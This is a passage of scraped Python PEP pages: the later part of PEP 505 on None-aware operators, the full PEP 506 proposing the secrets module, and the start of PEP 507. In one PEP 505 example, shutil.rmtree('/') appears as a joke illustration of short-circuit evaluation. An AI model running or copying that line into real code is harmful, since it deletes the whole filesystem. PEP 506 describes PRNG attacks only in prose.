def ex(): raise Exception()
(a ?? 2 ** b ?? 3) == a ?? (2 ** (b ?? 3))
(a * b ?? c // d) == a * (b ?? c) // d
(a ?? True and b ?? False) == (a ?? True) and (b ?? False)
(c() ?? c() ?? True) == True
(True ?? ex()) == True
(c ?? ex)() == c()
Particularly for cases such as a ?? 2 ** b ?? 3, parenthesizing the
sub-expressions any other way would result in TypeError, as int.__pow__
cannot be called with None (and the fact that the ?? operator is used
at all implies that a or b may be None). However, as usual,
while parentheses are not required they should be added if it helps improve
readability.
An augmented assignment for the ?? operator is also added. Augmented
coalescing assignment only rebinds the name if its current value is None.
If the target name already has a value, the right-hand side is not evaluated.
For example:
a = None
b = ''
c = 0
a ??= 'value'
b ??= undefined_name
c ??= shutil.rmtree('/') # don't try this at home, kids
assert a == 'value'
assert b == ''
assert c == 0 and any(os.scandir('/'))
The maybe-dot and maybe-subscript operators
The maybe-dot and maybe-subscript operators are added as trailers for atoms,
so that they may be used in all the same locations as the regular operators,
including as part of an assignment target (more details below). As the
existing evaluation rules are not directly embedded in the grammar, we specify
the required changes below.
Assume that the atom is always successfully evaluated. Each trailer is
then evaluated from left to right, applying its own parameter (either its
arguments, subscripts or attribute name) to produce the value for the next
trailer. Finally, if present, await is applied.
For example, await a.b(c).d[e] is currently parsed as
['await', 'a', '.b', '(c)', '.d', '[e]'] and evaluated:
_v = a
_v = _v.b
_v = _v(c)
_v = _v.d
_v = _v[e]
await _v
When a None-aware operator is present, the left-to-right evaluation may be
short-circuited. For example, await a?.b(c).d?[e] is evaluated:
_v = a
if _v is not None:
_v = _v.b
_v = _v(c)
_v = _v.d
if _v is not None:
_v = _v[e]
await _v
Note
await will almost certainly fail in this context, as it would in
the case where code attempts await None. We are not proposing to add a
None-aware await keyword here, and merely include it in this
example for completeness of the specification, since the atom_expr
grammar rule includes the keyword. If it were in its own rule, we would have
never mentioned it.
Parenthesised expressions are handled by the atom rule (not shown above),
which will implicitly terminate the short-circuiting behaviour of the above
transformation. For example, (a?.b ?? c).d?.e is evaluated as:
# a?.b
_v = a
if _v is not None:
_v = _v.b
# ... ?? c
if _v is None:
_v = c
# (...).d?.e
_v = _v.d
if _v is not None:
_v = _v.e
When used as an assignment target, the None-aware operations may only be
used in a “load” context. That is, a?.b = 1 and a?[b] = 1 will raise
SyntaxError. Use earlier in the expression (a?.b.c = 1) is permitted,
though unlikely to be useful unless combined with a coalescing operation:
(a?.b ?? d).c = 1
Reading expressions
For the maybe-dot and maybe-subscript operators, the intention is that
expressions including these operators should be read and interpreted as for the
regular versions of these operators. In “normal” cases, the end results are
going to be identical between an expression such as a?.b?[c] and
a.b[c], and just as we do not currently read “a.b” as “read attribute b
from a if it has an attribute a or else it raises AttributeError”, there is
no need to read “a?.b” as “read attribute b from a if a is not None”
(unless in a context where the listener needs to be aware of the specific
behaviour).
For coalescing expressions using the ?? operator, expressions should either
be read as “or … if None” or “coalesced with”. For example, the expression
a.get_value() ?? 100 would be read “call a dot get_value or 100 if None”,
or “call a dot get_value coalesced with 100”.
Note
Reading code in spoken text is always lossy, and so we make no attempt to
define an unambiguous way of speaking these operators. These suggestions
are intended to add context to the implications of adding the new syntax.
Examples
This section presents some examples of common None patterns and shows what
conversion to use None-aware operators may look like.
Standard Library
Using the find-pep505.py script [5] an analysis of the Python 3.7 standard
library discovered up to 678 code snippets that could be replaced with use of
one of the None-aware operators:
$ find /usr/lib/python3.7 -name '*.py' | xargs python3.7 find-pep505.py
<snip>
Total None-coalescing `if` blocks: 449
Total [possible] None-coalescing `or`: 120
Total None-coalescing ternaries: 27
Total Safe navigation `and`: 13
Total Safe navigation `if` blocks: 61
Total Safe navigation ternaries: 8
Some of these are shown below as examples before and after converting to use the
new operators.
From bisect.py:
def insort_right(a, x, lo=0, hi=None):
# ...
if hi is None:
hi = len(a)
# ...
After updating to use the ??= augmented assignment statement:
def insort_right(a, x, lo=0, hi=None):
# ...
hi ??= len(a)
# ...
From calendar.py:
encoding = options.encoding
if encoding is None:
encoding = sys.getdefaultencoding()
optdict = dict(encoding=encoding, css=options.css)
After updating to use the ?? operator:
optdict = dict(encoding=options.encoding ?? sys.getdefaultencoding(),
css=options.css)
From email/generator.py (and importantly note that there is no way to
substitute or for ?? in this situation):
mangle_from_ = True if policy is None else policy.mangle_from_
After updating:
mangle_from_ = policy?.mangle_from_ ?? True
From asyncio/subprocess.py:
def pipe_data_received(self, fd, data):
if fd == 1:
reader = self.stdout
elif fd == 2:
reader = self.stderr
else:
reader = None
if reader is not None:
reader.feed_data(data)
After updating to use the ?. operator:
def pipe_data_received(self, fd, data):
if fd == 1:
reader = self.stdout
elif fd == 2:
reader = self.stderr
else:
reader = None
reader?.feed_data(data)
From asyncio/tasks.py:
try:
await waiter
finally:
if timeout_handle is not None:
timeout_handle.cancel()
After updating to use the ?. operator:
try:
await waiter
finally:
timeout_handle?.cancel()
From ctypes/_aix.py:
if libpaths is None:
libpaths = []
else:
libpaths = libpaths.split(":")
After updating:
libpaths = libpaths?.split(":") ?? []
From os.py:
if entry.is_dir():
dirs.append(name)
if entries is not None:
entries.append(entry)
else:
nondirs.append(name)
After updating to use the ?. operator:
if entry.is_dir():
dirs.append(name)
entries?.append(entry)
else:
nondirs.append(name)
From importlib/abc.py:
def find_module(self, fullname, path):
if not hasattr(self, 'find_spec'):
return None
found = self.find_spec(fullname, path)
return found.loader if found is not None else None
After partially updating:
def find_module(self, fullname, path):
if not hasattr(self, 'find_spec'):
return None
return self.find_spec(fullname, path)?.loader
After extensive updating (arguably excessive, though that’s for the style
guides to determine):
def find_module(self, fullname, path):
return getattr(self, 'find_spec', None)?.__call__(fullname, path)?.loader
From dis.py:
def _get_const_info(const_index, const_list):
argval = const_index
if const_list is not None:
argval = const_list[const_index]
return argval, repr(argval)
After updating to use the ?[] and ?? operators:
def _get_const_info(const_index, const_list):
argval = const_list?[const_index] ?? const_index
return argval, repr(argval)
jsonify
This example is from a Python web crawler that uses the Flask framework as its
front-end. This function retrieves information about a web site from a SQL
database and formats it as JSON to send to an HTTP client:
class SiteView(FlaskView):
@route('/site/<id_>', methods=['GET'])
def get_site(self, id_):
site = db.query('site_table').find(id_)
return jsonify(
first_seen=site.first_seen.isoformat() if site.first_seen is not None else None,
id=site.id,
is_active=site.is_active,
last_seen=site.last_seen.isoformat() if site.last_seen is not None else None,
url=site.url.rstrip('/')
)
Both first_seen and last_seen are allowed to be null in the
database, and they are also allowed to be null in the JSON response. JSON
does not have a native way to represent a datetime, so the server’s contract
states that any non-null date is represented as an ISO-8601 string.
Without knowing the exact semantics of the first_seen and last_seen
attributes, it is impossible to know whether the attribute can be safely or
performantly accessed multiple times.
One way to fix this code is to replace each conditional expression with an
explicit value assignment and a full if/else block:
class SiteView(FlaskView):
@route('/site/<id_>', methods=['GET'])
def get_site(self, id_):
site = db.query('site_table').find(id_)
first_seen_dt = site.first_seen
if first_seen_dt is None:
first_seen = None
else:
first_seen = first_seen_dt.isoformat()
last_seen_dt = site.last_seen
if last_seen_dt is None:
last_seen = None
else:
last_seen = last_seen_dt.isoformat()
return jsonify(
first_seen=first_seen,
id=site.id,
is_active=site.is_active,
last_seen=last_seen,
url=site.url.rstrip('/')
)
This adds ten lines of code and four new code paths to the function,
dramatically increasing the apparent complexity. Rewriting using the
None-aware attribute operator results in shorter code with more clear
intent:
class SiteView(FlaskView):
@route('/site/<id_>', methods=['GET'])
def get_site(self, id_):
site = db.query('site_table').find(id_)
return jsonify(
first_seen=site.first_seen?.isoformat(),
id=site.id,
is_active=site.is_active,
last_seen=site.last_seen?.isoformat(),
url=site.url.rstrip('/')
)
Grab
The next example is from a Python scraping library called Grab:
class BaseUploadObject(object):
def find_content_type(self, filename):
ctype, encoding = mimetypes.guess_type(filename)
if ctype is None:
return 'application/octet-stream'
else:
return ctype
class UploadContent(BaseUploadObject):
def __init__(self, content, filename=None, content_type=None):
self.content = content
if filename is None:
self.filename = self.get_random_filename()
else:
self.filename = filename
if content_type is None:
self.content_type = self.find_content_type(self.filename)
else:
self.content_type = content_type
class UploadFile(BaseUploadObject):
def __init__(self, path, filename=None, content_type=None):
self.path = path
if filename is None:
self.filename = os.path.split(path)[1]
else:
self.filename = filename
if content_type is None:
self.content_type = self.find_content_type(self.filename)
else:
self.content_type = content_type
This example contains several good examples of needing to provide default
values. Rewriting to use conditional expressions reduces the overall lines of
code, but does not necessarily improve readability:
class BaseUploadObject(object):
def find_content_type(self, filename):
ctype, encoding = mimetypes.guess_type(filename)
return 'application/octet-stream' if ctype is None else ctype
class UploadContent(BaseUploadObject):
def __init__(self, content, filename=None, content_type=None):
self.content = content
self.filename = (self.get_random_filename() if filename
is None else filename)
self.content_type = (self.find_content_type(self.filename)
if content_type is None else content_type)
class UploadFile(BaseUploadObject):
def __init__(self, path, filename=None, content_type=None):
self.path = path
self.filename = (os.path.split(path)[1] if filename is
None else filename)
self.content_type = (self.find_content_type(self.filename)
if content_type is None else content_type)
The first ternary expression is tidy, but it reverses the intuitive order of
the operands: it should return ctype if it has a value and use the string
literal as fallback. The other ternary expressions are unintuitive and so
long that they must be wrapped. The overall readability is worsened, not
improved.
Rewriting using the None coalescing operator:
class BaseUploadObject(object):
def find_content_type(self, filename):
ctype, encoding = mimetypes.guess_type(filename)
return ctype ?? 'application/octet-stream'
class UploadContent(BaseUploadObject):
def __init__(self, content, filename=None, content_type=None):
self.content = content
self.filename = filename ?? self.get_random_filename()
self.content_type = content_type ?? self.find_content_type(self.filename)
class UploadFile(BaseUploadObject):
def __init__(self, path, filename=None, content_type=None):
self.path = path
self.filename = filename ?? os.path.split(path)[1]
self.content_type = content_type ?? self.find_content_type(self.filename)
This syntax has an intuitive ordering of the operands. In find_content_type,
for example, the preferred value ctype appears before the fallback value.
The terseness of the syntax also makes for fewer lines of code and less code to
visually parse, and reading from left-to-right and top-to-bottom more accurately
follows the execution flow.
Rejected Ideas
The first three ideas in this section are oft-proposed alternatives to treating
None as special. For further background on why these are rejected, see their
treatment in PEP 531 and
PEP 532 and the associated
discussions.
No-Value Protocol
The operators could be generalised to user-defined types by defining a protocol
to indicate when a value represents “no value”. Such a protocol may be a dunder
method __has_value__(self) that returns True if the value should be
treated as having a value, and False if the value should be treated as no
value.
With this generalization, object would implement a dunder method equivalent
to this:
def __has_value__(self):
return True
NoneType would implement a dunder method equivalent to this:
def __has_value__(self):
return False
In the specification section, all uses of x is None would be replaced with
not x.__has_value__().
This generalization would allow for domain-specific “no-value” objects to be
coalesced just like None. For example, the pyasn1 package has a type
called Null that represents an ASN.1 null:
>>> from pyasn1.type import univ
>>> univ.Null() ?? univ.Integer(123)
Integer(123)
Similarly, values such as math.nan and NotImplemented could be treated
as representing no value.
However, the “no-value” nature of these values is domain-specific, which means
they should be treated as a value by the language. For example,
math.nan.imag is well defined (it’s 0.0), and so short-circuiting
math.nan?.imag to return math.nan would be incorrect.
As None is already defined by the language as being the value that
represents “no value”, and the current specification would not preclude
switching to a protocol in the future (though changes to built-in objects would
not be compatible), this idea is rejected for now.
Boolean-aware operators
This suggestion is fundamentally the same as adding a no-value protocol, and so
the discussion above also applies.
Similar behavior to the ?? operator can be achieved with an or
expression, however or checks whether its left operand is false-y and not
specifically None. This approach is attractive, as it requires fewer changes
to the language, but ultimately does not solve the underlying problem correctly.
Assuming the check is for truthiness rather than None, there is no longer a
need for the ?? operator. However, applying this check to the ?. and
?[] operators prevents perfectly valid operations applying
Consider the following example, where get_log_list() may return either a
list containing current log messages (potentially empty), or None if logging
is not enabled:
lst = get_log_list()
lst?.append('A log message')
If ?. is checking for true values rather than specifically None and the
log has not been initialized with any items, no item will ever be appended. This
violates the obvious intent of the code, which is to append an item. The
append method is available on an empty list, as are all other list methods,
and there is no reason to assume that these members should not be used because
the list is presently empty.
Further, there is no sensible result to use in place of the expression. A
normal lst.append returns None, but under this idea lst?.append may
result in either [] or None, depending on the value of lst. As with
the examples in the previous section, this makes no sense.
As checking for truthiness rather than None results in apparently valid
expressions no longer executing as intended, this idea is rejected.
Exception-aware operators
Arguably, the reason to short-circuit an expression when None is encountered
is to avoid the AttributeError or TypeError that would be raised under
normal circumstances. As an alternative to testing for None, the ?. and
?[] operators could instead handle AttributeError and TypeError
raised by the operation and skip the remainder of the expression.
This produces a transformation for a?.b.c?.d.e similar to this:
_v = a
try:
_v = _v.b
except AttributeError:
pass
else:
_v = _v.c
try:
_v = _v.d
except AttributeError:
pass
else:
_v = _v.e
One open question is which value should be returned as the expression when an
exception is handled. The above example simply leaves the partial result, but
this is not helpful for replacing with a default value. An alternative would be
to force the result to None, which then raises the question as to why
None is special enough to be the result but not special enough to be the
test.
Secondly, this approach masks errors within code executed implicitly as part of
the expression. For ?., any AttributeError within a property or
__getattr__ implementation would be hidden, and similarly for ?[] and
__getitem__ implementations.
Similarly, simple typing errors such as {}?.ietms() could go unnoticed.
Existing conventions for handling these kinds of errors in the form of the
getattr builtin and the .get(key, default) method pattern established by
dict show that it is already possible to explicitly use this behaviour.
As this approach would hide errors in code, it is rejected.
None-aware Function Call
The None-aware syntax applies to attribute and index access, so it seems
natural to ask if it should also apply to function invocation syntax. It might
be written as foo?(), where foo is only called if it is not None.
This has been deferred on the basis of the proposed operators being intended
to aid traversal of partially populated hierarchical data structures, not
for traversal of arbitrary class hierarchies. This is reflected in the fact
that none of the other mainstream languages that already offer this syntax
have found it worthwhile to support a similar syntax for optional function
invocations.
A workaround similar to that used by C# would be to write
maybe_none?.__call__(arguments). If the callable is None, the
expression will not be evaluated. (The C# equivalent uses ?.Invoke() on its
callable type.)
? Unary Postfix Operator
To generalize the None-aware behavior and limit the number of new operators
introduced, a unary, postfix operator spelled ? was suggested. The idea is
that ? might return a special object that could would override dunder
methods that return self. For example, foo? would evaluate to foo if
it is not None, otherwise it would evaluate to an instance of
NoneQuestion:
class NoneQuestion():
def __call__(self, *args, **kwargs):
return self
def __getattr__(self, name):
return self
def __getitem__(self, key):
return self
With this new operator and new type, an expression like foo?.bar[baz]
evaluates to NoneQuestion if foo is None. This is a nifty
generalization, but it’s difficult to use in practice since most existing code
won’t know what NoneQuestion is.
Going back to one of the motivating examples above, consider the following:
>>> import json
>>> created = None
>>> json.dumps({'created': created?.isoformat()})
The JSON serializer does not know how to serialize NoneQuestion, nor will
any other API. This proposal actually requires lots of specialized logic
throughout the standard library and any third party library.
At the same time, the ? operator may also be too general, in the sense
that it can be combined with any other operator. What should the following
expressions mean?:
>>> x? + 1
>>> x? -= 1
>>> x? == 1
>>> ~x?
This degree of generalization is not useful. The operators actually proposed
herein are intentionally limited to a few operators that are expected to make it
easier to write common code patterns.
Built-in maybe
Haskell has a concept called Maybe that
encapsulates the idea of an optional value without relying on any special
keyword (e.g. null) or any special instance (e.g. None). In Haskell, the
purpose of Maybe is to avoid separate handling of “something” and nothing”.
A Python package called pymaybe provides a
rough approximation. The documentation shows the following example:
>>> maybe('VALUE').lower()
'value'
>>> maybe(None).invalid().method().or_else('unknown')
'unknown'
The function maybe() returns either a Something instance or a
Nothing instance. Similar to the unary postfix operator described in the
previous section, Nothing overrides dunder methods in order to allow
chaining on a missing value.
Note that or_else() is eventually required to retrieve the underlying value
from pymaybe’s wrappers. Furthermore, pymaybe does not short circuit any
evaluation. Although pymaybe has some strengths and may be useful in its own
right, it also demonstrates why a pure Python implementation of coalescing is
not nearly as powerful as support built into the language.
The idea of adding a builtin maybe type to enable this scenario is rejected.
Just use a conditional expression
Another common way to initialize default values is to use the ternary operator.
Here is an excerpt from the popular Requests package:
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
This particular formulation has the undesirable effect of putting the operands
in an unintuitive order: the brain thinks, “use data if possible and use
[] as a fallback,” but the code puts the fallback before the preferred
value.
The author of this package could have written it like this instead:
data = data if data is not None else []
files = files if files is not None else []
headers = headers if headers is not None else {}
params = params if params is not None else {}
hooks = hooks if hooks is not None else {}
This ordering of the operands is more intuitive, but it requires 4 extra
characters (for “not “). It also highlights the repetition of identifiers:
data if data, files if files, etc.
When written using the None coalescing operator, the sample reads:
data = data ?? []
files = files ?? []
headers = headers ?? {}
params = params ?? {}
hooks = hooks ?? {}
References
[1]
C# Reference: Operators
(https://learn.microsoft.com/en/dotnet/csharp/language-reference/operators/)
[2]
A Tour of the Dart Language: Operators
(https://www.dartlang.org/docs/dart-up-and-running/ch02.html#operators)
[3]
Proposal: Nullish Coalescing for JavaScript
(https://github.com/tc39/proposal-nullish-coalescing)
[4]
Proposal: Optional Chaining for JavaScript
(https://github.com/tc39/proposal-optional-chaining)
[5]
Associated scripts
(https://github.com/python/peps/tree/master/pep-0505/)
Copyright
This document has been placed in the public domain.
| Deferred | PEP 505 – None-aware operators | Standards Track | Several modern programming languages have so-called “null-coalescing” or
“null- aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP
(starting in version 7). There are also stage 3 draft proposals for their
addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide
syntactic sugar for common patterns involving null references. |
PEP 506 – Adding A Secrets Module To The Standard Library
Author:
Steven D’Aprano <steve at pearwood.info>
Status:
Final
Type:
Standards Track
Created:
19-Sep-2015
Python-Version:
3.6
Post-History:
Table of Contents
Abstract
Definitions
Rationale
Proposal
API and Implementation
Default arguments
Naming conventions
Alternatives
Comparison To Other Languages
What Should Be The Name Of The Module?
Frequently Asked Questions
References
Copyright
Abstract
This PEP proposes the addition of a module for common security-related
functions such as generating tokens to the Python standard library.
Definitions
Some common abbreviations used in this proposal:
PRNG:Pseudo Random Number Generator. A deterministic algorithm used
to produce random-looking numbers with certain desirable
statistical properties.
CSPRNG:Cryptographically Strong Pseudo Random Number Generator. An
algorithm used to produce random-looking numbers which are
resistant to prediction.
MT:Mersenne Twister. An extensively studied PRNG which is currently
used by the random module as the default.
Rationale
This proposal is motivated by concerns that Python’s standard library
makes it too easy for developers to inadvertently make serious security
errors. Theo de Raadt, the founder of OpenBSD, contacted Guido van Rossum
and expressed some concern [1] about the use of MT for generating sensitive
information such as passwords, secure tokens, session keys and similar.
Although the documentation for the random module explicitly states that
the default is not suitable for security purposes [2], it is strongly
believed that this warning may be missed, ignored or misunderstood by
many Python developers. In particular:
developers may not have read the documentation and consequently
not seen the warning;
they may not realise that their specific use of the module has security
implications; or
not realising that there could be a problem, they have copied code
(or learned techniques) from websites which don’t offer best
practises.
The first [3] hit when searching for “python how to generate passwords” on
Google is a tutorial that uses the default functions from the random
module [4]. Although it is not intended for use in web applications, it is
likely that similar techniques find themselves used in that situation.
The second hit is to a StackOverflow question about generating
passwords [5]. Most of the answers given, including the accepted one, use
the default functions. When one user warned that the default could be
easily compromised, they were told “I think you worry too much.” [6]
This strongly suggests that the existing random module is an attractive
nuisance when it comes to generating (for example) passwords or secure
tokens.
Additional motivation (of a more philosophical bent) can be found in the
post which first proposed this idea [7].
Proposal
Alternative proposals have focused on the default PRNG in the random
module, with the aim of providing “secure by default” cryptographically
strong primitives that developers can build upon without thinking about
security. (See Alternatives below.) This proposes a different approach:
The standard library already provides cryptographically strong
primitives, but many users don’t know they exist or when to use them.
Instead of requiring crypto-naive users to write secure code, the
standard library should include a set of ready-to-use “batteries” for
the most common needs, such as generating secure tokens. This code
will both directly satisfy a need (“How do I generate a password reset
token?”), and act as an example of acceptable practises which
developers can learn from [8].
To do this, this PEP proposes that we add a new module to the standard
library, with the suggested name secrets. This module will contain a
set of ready-to-use functions for common activities with security
implications, together with some lower-level primitives.
The suggestion is that secrets becomes the go-to module for dealing
with anything which should remain secret (passwords, tokens, etc.)
while the random module remains backward-compatible.
API and Implementation
This PEP proposes the following functions for the secrets module:
Functions for generating tokens suitable for use in (e.g.) password
recovery, as session keys, etc., in the following formats:
as bytes, secrets.token_bytes;
as text, using hexadecimal digits, secrets.token_hex;
as text, using URL-safe base-64 encoding, secrets.token_urlsafe.
A limited interface to the system CSPRNG, using either os.urandom
directly or random.SystemRandom. Unlike the random module, this
does not need to provide methods for seeding, getting or setting the
state, or any non-uniform distributions. It should provide the
following:
A function for choosing items from a sequence, secrets.choice.
A function for generating a given number of random bits and/or bytes
as an integer, secrets.randbits.
A function for returning a random integer in the half-open range
0 to the given upper limit, secrets.randbelow [9].
A function for comparing text or bytes digests for equality while being
resistant to timing attacks, secrets.compare_digest.
The consensus appears to be that there is no need to add a new CSPRNG to
the random module to support these uses, SystemRandom will be
sufficient.
Some illustrative implementations have been given by Alyssa (Nick) Coghlan [10]
and a minimalist API by Tim Peters [11]. This idea has also been discussed
on the issue tracker for the “cryptography” module [12]. The following
pseudo-code should be taken as the starting point for the real
implementation:
from random import SystemRandom
from hmac import compare_digest
_sysrand = SystemRandom()
randbits = _sysrand.getrandbits
choice = _sysrand.choice
def randbelow(exclusive_upper_bound):
return _sysrand._randbelow(exclusive_upper_bound)
DEFAULT_ENTROPY = 32 # bytes
def token_bytes(nbytes=None):
if nbytes is None:
nbytes = DEFAULT_ENTROPY
return os.urandom(nbytes)
def token_hex(nbytes=None):
return binascii.hexlify(token_bytes(nbytes)).decode('ascii')
def token_urlsafe(nbytes=None):
tok = token_bytes(nbytes)
return base64.urlsafe_b64encode(tok).rstrip(b'=').decode('ascii')
The secrets module itself will be pure Python, and other Python
implementations can easily make use of it unchanged, or adapt it as
necessary. An implementation can be found on BitBucket [13].
Default arguments
One difficult question is “How many bytes should my token be?”. We can
help with this question by providing a default amount of entropy for the
“token_*” functions. If the nbytes argument is None or not given, the
default entropy will be used. This default value should be large enough
to be expected to be secure for medium-security uses, but is expected to
change in the future, possibly even in a maintenance release [14].
Naming conventions
One question is the naming conventions used in the module [15], whether to
use C-like naming conventions such as “randrange” or more Pythonic names
such as “random_range”.
Functions which are simply bound methods of the private SystemRandom
instance (e.g. randrange), or a thin wrapper around such, should keep
the familiar names. Those which are something new (such as the various
token_* functions) will use more Pythonic names.
Alternatives
One alternative is to change the default PRNG provided by the random
module [16]. This received considerable scepticism and outright opposition:
There is fear that a CSPRNG may be slower than the current PRNG (which
in the case of MT is already quite slow).
Some applications (such as scientific simulations, and replaying
gameplay) require the ability to seed the PRNG into a known state,
which a CSPRNG lacks by design.
Another major use of the random module is for simple “guess a number”
games written by beginners, and many people are loath to make any
change to the random module which may make that harder.
Although there is no proposal to remove MT from the random module,
there was considerable hostility to the idea of having to opt-in to
a non-CSPRNG or any backwards-incompatible changes.
Demonstrated attacks against MT are typically against PHP applications.
It is believed that PHP’s version of MT is a significantly softer target
than Python’s version, due to a poor seeding technique [17]. Consequently,
without a proven attack against Python applications, many people object
to a backwards-incompatible change.
Alyssa Coghlan made an earlier suggestion
for a globally configurable PRNG
which uses the system CSPRNG by default, but has since withdrawn it
in favour of this proposal.
Comparison To Other Languages
PHPPHP includes a function uniqid [18] which by default returns a
thirteen character string based on the current time in microseconds.
Translated into Python syntax, it has the following signature:
def uniqid(prefix='', more_entropy=False)->str
The PHP documentation warns that this function is not suitable for
security purposes. Nevertheless, various mature, well-known PHP
applications use it for that purpose (citation needed).
PHP 5.3 and better also includes a function openssl_random_pseudo_bytes
[19]. Translated into Python syntax, it has roughly the following
signature:
def openssl_random_pseudo_bytes(length:int)->Tuple[str, bool]
This function returns a pseudo-random string of bytes of the given
length, and a boolean flag giving whether the string is considered
cryptographically strong. The PHP manual suggests that returning
anything but True should be rare except for old or broken platforms.
JavaScriptBased on a rather cursory search [20], there do not appear to be any
well-known standard functions for producing strong random values in
JavaScript. Math.random is often used, despite serious weaknesses
making it unsuitable for cryptographic purposes [21]. In recent years
the majority of browsers have gained support for window.crypto.getRandomValues [22].
Node.js offers a rich cryptographic module, crypto [23], most of
which is beyond the scope of this PEP. It does include a single function
for generating random bytes, crypto.randomBytes.
RubyThe Ruby standard library includes a module SecureRandom [24]
which includes the following methods:
base64 - returns a Base64 encoded random string.
hex - returns a random hexadecimal string.
random_bytes - returns a random byte string.
random_number - depending on the argument, returns either a random
integer in the range(0, n), or a random float between 0.0 and 1.0.
urlsafe_base64 - returns a random URL-safe Base64 encoded string.
uuid - return a version 4 random Universally Unique IDentifier.
What Should Be The Name Of The Module?
There was a proposal to add a “random.safe” submodule, quoting the Zen
of Python “Namespaces are one honking great idea” koan. However, the
author of the Zen, Tim Peters, has come out against this idea [25], and
recommends a top-level module.
In discussion on the python-ideas mailing list so far, the name “secrets”
has received some approval, and no strong opposition.
There is already an existing third-party module with the same name [26],
but it appears to be unused and abandoned.
Frequently Asked Questions
Q: Is this a real problem? Surely MT is random enough that nobody can
predict its output.A: The consensus among security professionals is that MT is not safe
in security contexts. It is not difficult to reconstruct the internal
state of MT [27] [28] and so predict all past and future values. There
are a number of known, practical attacks on systems using MT for
randomness [29].
Q: Attacks on PHP are one thing, but are there any known attacks on
Python software?A: Yes. There have been vulnerabilities in Zope and Plone at the very
least. Hanno Schlichting commented [30]:
"In the context of Plone and Zope a practical attack was
demonstrated, but I can't find any good non-broken links about
this anymore. IIRC Plone generated a random number and exposed
this on each error page along the lines of 'Sorry, you encountered
an error, your problem has been filed as <random number>, please
include this when you contact us'. This allowed anyone to do large
numbers of requests to this page and get enough random values to
reconstruct the MT state. A couple of security related modules used
random instead of system random (cookie session ids, password reset
links, auth token), so the attacker could break all of those."
Christian Heimes reported this issue to the Zope security team in 2012 [31],
there are at least two related CVE vulnerabilities [32], and at least one
work-around for this issue in Django [33].
Q: Is this an alternative to specialist cryptographic software such as SSL?A: No. This is a “batteries included” solution, not a full-featured
“nuclear reactor”. It is intended to mitigate against some basic
security errors, not be a solution to all security-related issues. To
quote Alyssa Coghlan referring to her earlier proposal [34]:
"...folks really are better off learning to use things like
cryptography.io for security sensitive software, so this change
is just about harm mitigation given that it's inevitable that a
non-trivial proportion of the millions of current and future
Python developers won't do that."
Q: What about a password generator?A: The consensus is that the requirements for password generators are too
variable for it to be a good match for the standard library [35]. No password
generator will be included in the initial release of the module, instead it
will be given in the documentation as a recipe (à la the recipes in the
itertools module) [36].
Q: Will secrets use /dev/random (which blocks) or /dev/urandom (which
doesn’t block) on Linux? What about other platforms?A: secrets will be based on os.urandom and random.SystemRandom,
which are interfaces to your operating system’s best source of cryptographic
randomness. On Linux, that may be /dev/urandom [37], on Windows it may be
CryptGenRandom(), but see the documentation and/or source code for the
detailed implementation details.
References
[1]
https://mail.python.org/pipermail/python-ideas/2015-September/035820.html
[2]
https://docs.python.org/3/library/random.html
[3]
As of the date of writing. Also, as Google search terms may be
automatically customised for the user without their knowledge, some
readers may see different results.
[4]
http://interactivepython.org/runestone/static/everyday/2013/01/3_password.html
[5]
http://stackoverflow.com/questions/3854692/generate-password-in-python
[6]
http://stackoverflow.com/questions/3854692/generate-password-in-python/3854766#3854766
[7]
https://mail.python.org/pipermail/python-ideas/2015-September/036238.html
[8]
At least those who are motivated to read the source code and documentation.
[9]
After considerable discussion, Guido ruled that the module need only
provide randbelow, and not similar functions randrange or
randint. http://code.activestate.com/lists/python-dev/138375/
[10]
https://mail.python.org/pipermail/python-ideas/2015-September/036271.html
[11]
https://mail.python.org/pipermail/python-ideas/2015-September/036350.html
[12]
https://github.com/pyca/cryptography/issues/2347
[13]
https://bitbucket.org/sdaprano/secrets
[14]
https://mail.python.org/pipermail/python-ideas/2015-September/036517.html
https://mail.python.org/pipermail/python-ideas/2015-September/036515.html
[15]
https://mail.python.org/pipermail/python-ideas/2015-September/036474.html
[16]
Link needed.
[17]
By default PHP seeds the MT PRNG with the time (citation needed),
which is exploitable by attackers, while Python seeds the PRNG with
output from the system CSPRNG, which is believed to be much harder to
exploit.
[18]
http://php.net/manual/en/function.uniqid.php
[19]
http://php.net/manual/en/function.openssl-random-pseudo-bytes.php
[20]
Volunteers and patches are welcome.
[21]
http://ifsec.blogspot.fr/2012/05/cross-domain-mathrandom-prediction.html
[22]
https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues
[23]
https://nodejs.org/api/crypto.html
[24]
http://ruby-doc.org/stdlib-2.1.2/libdoc/securerandom/rdoc/SecureRandom.html
[25]
https://mail.python.org/pipermail/python-ideas/2015-September/036254.html
[26]
https://pypi.python.org/pypi/secrets
[27]
https://jazzy.id.au/2010/09/22/cracking_random_number_generators_part_3.html
[28]
https://mail.python.org/pipermail/python-ideas/2015-September/036077.html
[29]
https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf
[30]
Personal communication, 2016-08-24.
[31]
https://bugs.launchpad.net/zope2/+bug/1071067
[32]
http://www.cvedetails.com/cve/CVE-2012-5508/
http://www.cvedetails.com/cve/CVE-2012-6661/
[33]
https://github.com/django/django/commit/1525874238fd705ec17a066291935a9316bd3044
[34]
https://mail.python.org/pipermail/python-ideas/2015-September/036157.html
[35]
https://mail.python.org/pipermail/python-ideas/2015-September/036476.html
https://mail.python.org/pipermail/python-ideas/2015-September/036478.html
[36]
https://mail.python.org/pipermail/python-ideas/2015-September/036488.html
[37]
http://sockpuppet.org/blog/2014/02/25/safely-generate-random-numbers/
http://www.2uo.de/myths-about-urandom/
Copyright
This document has been placed in the public domain.
| Final | PEP 506 – Adding A Secrets Module To The Standard Library | Standards Track | This PEP proposes the addition of a module for common security-related
functions such as generating tokens to the Python standard library. |
PEP 507 – Migrate CPython to Git and GitLab
Author:
Barry Warsaw <barry at python.org>
Status:
Rejected
Type:
Process
Created:
30-Sep-2015
Post-History:
Resolution:
Core-Workflow message
Table of Contents
Abstract
Rationale
Version Control System
Repository Hosting
Code Review
GitLab merge requests
Criticism
X is not written in Python
Mercurial is better than Git
CPython Workflow is too Complicated
Open issues
References
Copyright
Abstract
This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git. Further, it proposes adopting a
hosted GitLab instance as the primary way of handling merge requests,
code reviews, and code hosting. It is similar in intent to PEP 481
